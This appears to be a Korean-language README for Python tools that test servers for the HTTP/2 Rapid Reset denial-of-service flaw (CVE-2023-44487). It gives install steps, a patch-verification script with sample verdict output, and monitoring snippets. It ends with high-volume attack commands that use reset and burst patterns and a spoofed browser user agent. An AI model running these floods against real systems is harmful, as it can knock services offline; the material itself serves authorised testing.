
CVE-2023-44487, HTTP/2 Rapid Reset 취약점을 위한 포괄적인 Python 테스트 도구입니다. 이 향상된 버전은 테스트 매개변수에 대한 세밀한 제어, 여러 공격 패턴 및 고급 모니터링 기능을 제공합니다.
CVE-2023-44487, HTTP/2 Rapid Reset 취약점을 위한 포괄적인 Python 테스트 도구입니다. 이 저장소에는 공격 테스트 도구와 검증 중심 도구가 모두 포함되어 있습니다.
이 도구는 교육 및 승인된 테스트 목적으로만 사용하세요!
CVE-2023-44487는 'HTTP/2 Rapid Reset'으로도 알려져 있으며, HTTP/2 프로토콜의 치명적인 취약점으로 공격자가 다음을 수행할 수 있습니다:
CVSS 점수: 7.5 (높음)
영향: 서비스 거부, 리소스 고갈
h2 라이브러리: pip install h2git clone https://github.com/madhusudhan-in/CVE_2023_44487-Rapid_Reset.git
cd CVE_2023_44487-Rapid_Reset
pip install h2
chmod +x *.py
python3 --version # Should be 3.7+
cve_2023_44487_verifier_enhanced.py목적: 패치 후 검증 및 규정 준수 확인을 위한 시행 신호 감지
# Basic verification
python3 cve_2023_44487_verifier_enhanced.py target.com
# Multiple concurrent connections
python3 cve_2023_44487_verifier_enhanced.py target.com -c 5 -s 500
# Verbose output with debugging
python3 cve_2023_44487_verifier_enhanced.py target.com -v -c 3 -s 1000
# Baseline test only (normal requests)
python3 cve_2023_44487_verifier_enhanced.py target.com --baseline-only
| Option | Description | Default |
|---|---|---|
host | 대상 호스트 이름 (필수) | - |
-p, --port | 대상 포트 | 443 |
--no-ssl | SSL/TLS 비활성화 | False (SSL enabled) |
-s, --streams | 연결당 스트림 수 | 1000 |
-d, --delay | 스트림 작업 간 지연 (초) | 0.001 |
-c, --connections | 동시 연결 수 | 1 |
--baseline-only | 기준 테스트만 수행 (공격 없음) | False |
-v, --verbose | 상세/디버그 출력 | False |
스크립트는 RFC 9113 준수 시행 신호를 기반으로 지능형 판정을 제공합니다.
서버가 ENHANCE_YOUR_CALM (0xb) 오류 코드로 GOAWAY 전송
분류: 취약하지 않음 — 프로토콜 계층 시행 활성화
의미: HTTP/2 구현에 적절한 속도 제어 기능 있음
50% 이상의 연결이 TCP 재설정으로 종료됨
분류: 보호 가능성 높음 — 에지/인프라 팀과 확인
의미: 에지 장비 또는 DDoS 보호가 전송 계층에서 작동 중
초당 재설정 속도가 시간이 지남에 따라 크게 감소 (후반 버킷이 초반의 60% 미만)
분류: 부분 보호 — 인프라 팀과 확인
의미: 서버 또는 에지가 공격을 적응적으로 늦춤
서버가 REFUSED_STREAM (0x7) 응답 전송
분류: 부분 보호 — 속도 제한 검토
의미: 일부 스트림 수준 속도 제한 적용
ENHANCE_YOUR_CALM GOAWAY 없음, TCP 재설정 없음, 스로틀링 감지되지 않음
분류: 벡터 실행 가능 — 익스플로잇 가능성 확인되지 않음
중요: 이것이 DoS 익스플로잇 가능성을 증명하지는 않습니다. 에지 볼륨/행동 보호(Akamai, CloudFlare)는 더 높은 규모에서 작동할 수 있습니다.
============================================================
ENFORCEMENT SIGNAL ANALYSIS
============================================================
Server SETTINGS (initial frame):
HEADER_TABLE_SIZE = 4096
ENABLE_PUSH = True
MAX_CONCURRENT_STREAMS = 128
INITIAL_WINDOW_SIZE = 65535
MAX_FRAME_SIZE = 16384
→ MAX_CONCURRENT_STREAMS=128 is conservative (good post-CVE default)
GOAWAY breakdown across connections:
ENHANCE_YOUR_CALM (0xb): 3/5
Other GOAWAY codes: 1/5
No GOAWAY received: 1/5
TCP reset (RST at transport): 0/5
Total RST_STREAM frames from server: 2
REFUSED_STREAM frames from server: 0
Connections showing adaptive throttling: 1/5
============================================================
VERDICT
============================================================
✅ ENFORCEMENT CONFIRMED
3/5 connection(s) received GOAWAY with ENHANCE_YOUR_CALM (0xb).
This is the canonical signal that the CVE-2023-44487 mitigation is active.
Classification: NOT VULNERABLE — protocol-layer enforcement is engaged.
# Verify patch deployment with 10 connections, 500 streams each
python3 cve_2023_44487_verifier_enhanced.py prod-api.example.com \
-c 10 \
-s 500 \
-d 0.0001 \
-v
# Test non-standard HTTPS port
python3 cve_2023_44487_verifier_enhanced.py example.com \
-p 8443 \
-c 5 \
-s 1000
# Minimal load compliance test
python3 cve_2023_44487_verifier_enhanced.py example.com \
-c 3 \
-s 200 \
--baseline-only
ENHANCE_YOUR_CALM (Error Code 0xb):
REFUSED_STREAM (Error Code 0x7):
초당 재설정 속도 분석:
전송 계층 TCP RST:
| Close Cause | Meaning |
|---|---|
goaway_enhance_your_calm | GOAWAY 0xb 수신 (CVE 수정의 최고 지표) |
goaway_* | 다른 오류 코드의 GOAWAY |
tcp_reset | TCP RST 수신 (에지 수준 개입) |
broken_pipe / recv_error | 통신 중 연결 오류 |
eof_no_goaway | GOAWAY 없이 예기치 않은 EOF |
no_close_no_enforcement | 연결이 열린 상태 유지 (시행 감지되지 않음) |
import asyncio
import subprocess
def run_verification(target: str, num_connections: int = 3):
cmd = [
'python3', 'cve_2023_44487_verifier_enhanced.py',
target,
'-c', str(num_connections),
'-s', '500',
'-v'
]
result = subprocess.run(cmd, capture_output=True, text=True)
# Parse verdict from output
if "ENFORCEMENT CONFIRMED" in result.stdout:
print(f"✅ {target} is protected")
return "protected"
elif "LIKELY PROTECTED" in result.stdout:
print(f"⚠️ {target} has edge-level protection")
return "edge_protected"
else:
print(f"❌ {target} shows no enforcement")
return "vulnerable"
# Run test
status = run_verification("example.com", 5)
#!/bin/bash
# Monitor critical services weekly
TARGETS="api.example.com web.example.com cdn.example.com"
LOG_DIR="/var/log/cve-2023-44487"
mkdir -p "$LOG_DIR"
for target in $TARGETS; do
python3 cve_2023_44487_verifier_enhanced.py "$target" \
-c 3 \
-s 500 \
-v > "$LOG_DIR/$target-$(date +%Y%m%d).log" 2>&1
done
rapid_reset_test.py목적: 다양한 패턴을 사용한 포괄적인 HTTP/2 Rapid Reset 공격 테스트
python3 rapid_reset_test.py https://target-server.com
python3 rapid_reset_test.py https://target.com \
--connections 50 \
--requests 1000 \
--delay 0 \
--pattern rapid_reset \
--track-latency \
--output json
python3 rapid_reset_test.py https://target.com \
--pattern burst_reset \
--burst-size 5 \
--burst-delay 2.0 \
--custom-headers "User-Agent: Mozilla/5.0" \
--jitter 0.3